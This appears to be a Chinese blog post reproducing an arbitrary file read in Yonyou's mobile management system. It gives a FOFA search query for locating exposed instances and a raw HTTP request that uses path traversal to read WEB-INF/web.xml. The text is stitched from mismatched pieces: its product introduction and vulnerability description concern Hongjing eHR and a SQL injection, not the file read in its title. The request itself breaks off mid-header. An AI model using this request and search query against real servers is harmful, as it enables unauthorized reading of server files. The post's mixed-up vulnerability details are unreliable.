用友 移动管理系统 DownloadServlet 任意文件读取漏洞复现(含nuclei-POC)

免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为承担任何责任,一旦造成后果请自行承担!
一、产品介绍

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

二、漏洞描述

宏景eHR FrCodeAddTreeServlet 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令,从而获取服务器敏感信息。

三、漏洞危害

未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令,从而获取服务器敏感信息。

四、漏洞复现

FOFA:app="用友-移动管理系统"

用友 移动管理系统 DownloadServlet 任意文件读取漏洞复现(含nuclei-POC)_第1张图片

POC如下

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml HTTP/1.1
Host: url
Connection: keep-alive
sec-ch-ua: "Not_A Brand";v="8

你可能感兴趣的:(漏洞复现,安全,网络安全,web安全)